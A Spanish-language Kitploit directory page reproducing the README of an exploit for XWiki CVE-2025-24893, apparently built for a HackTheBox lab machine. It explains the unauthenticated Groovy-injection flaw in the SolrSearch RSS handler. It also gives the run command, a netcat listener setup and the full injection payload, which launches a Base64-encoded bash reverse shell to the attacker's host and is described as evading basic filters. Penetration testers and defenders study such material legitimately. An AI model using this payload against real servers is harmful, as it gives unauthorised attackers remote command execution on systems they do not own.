Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/tomkingori/xwiki-cve-2025-24893-exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubtomkingori/xwiki-cve-2025-24893-exploit

xwiki-cve-2025-24893-exploit

Exploit de RCE no autenticado para XWiki CVE-2025-24893 mediante inyección de scripts Groovy

Ver Repositorio
hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de XWiki CVE-2025-24893

Exploit de ejecución remota de código sin autenticación para versiones de XWiki vulnerables a CVE-2025-24893.

Resumen de la Vulnerabilidad

Las versiones de XWiki anteriores a 15.10.9 son vulnerables a RCE sin autenticación mediante inyección de scripts Groovy en el manejador de fuentes RSS de SolrSearch. La vulnerabilidad existe porque XWiki no sanea adecuadamente la entrada del usuario en el parámetro text, lo que permite a los atacantes salir del contexto RSS e inyectar código Groovy arbitrario.

ID de CVE: CVE-2025-24893
Puntuación CVSS: 9.8 (Crítico)
Versiones Afectadas: XWiki < 15.10.9

Características

  • Interfaz de línea de comandos sencilla
  • Generación y codificación automática de payloads
  • Reverse shell codificada en Base64 para evadir filtros básicos
  • Dependencias mínimas (solo la librería requests)

Requisitos

root@kitploit:~
pip3 install requests

Uso

root@kitploit:~
python3 exploit.py <target_url> <attacker_ip> <listener_port>

Ejemplo:

root@kitploit:~
# Iniciar listener en la máquina del atacante
nc -lvnp 9001

# Ejecutar el exploit
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001

Cómo Funciona

  1. Construye un comando de reverse shell en bash
  2. Codifica el payload en Base64
  3. Lo envuelve en código Groovy mediante inyección de plantillas (}}}}}}{{{{groovy}}}})
  4. Codifica el payload en URL preservando los delimitadores necesarios
  5. Envía una petición GET a /xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload>
  6. XWiki procesa la fuente RSS maliciosa y ejecuta el código Groovy

Prueba de Concepto

El exploit apunta al siguiente endpoint:

root@kitploit:~
/xwiki/bin/get/Main/SolrSearch?media=rss&text=

La vulnerabilidad permite salir del contexto de la fuente RSS:

root@kitploit:~
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}

Descargo de Responsabilidad

Esta herramienta es solo para fines educativos y de pruebas de penetración autorizadas. El autor no es responsable de ningún uso indebido o daño causado por este programa. Utilice este exploit únicamente contra sistemas que posea o para los que tenga permiso explícito de prueba.

Referencias

  • Aviso de seguridad de XWiki
  • CVE-2025-24893

Licencia

Licencia MIT: consulte el archivo LICENSE para más detalles

Autor

Creado para la máquina "Editor" de HTB


Nota: Asegúrese siempre de tener la autorización adecuada antes de probar cualquier sistema.

Descargar herramienta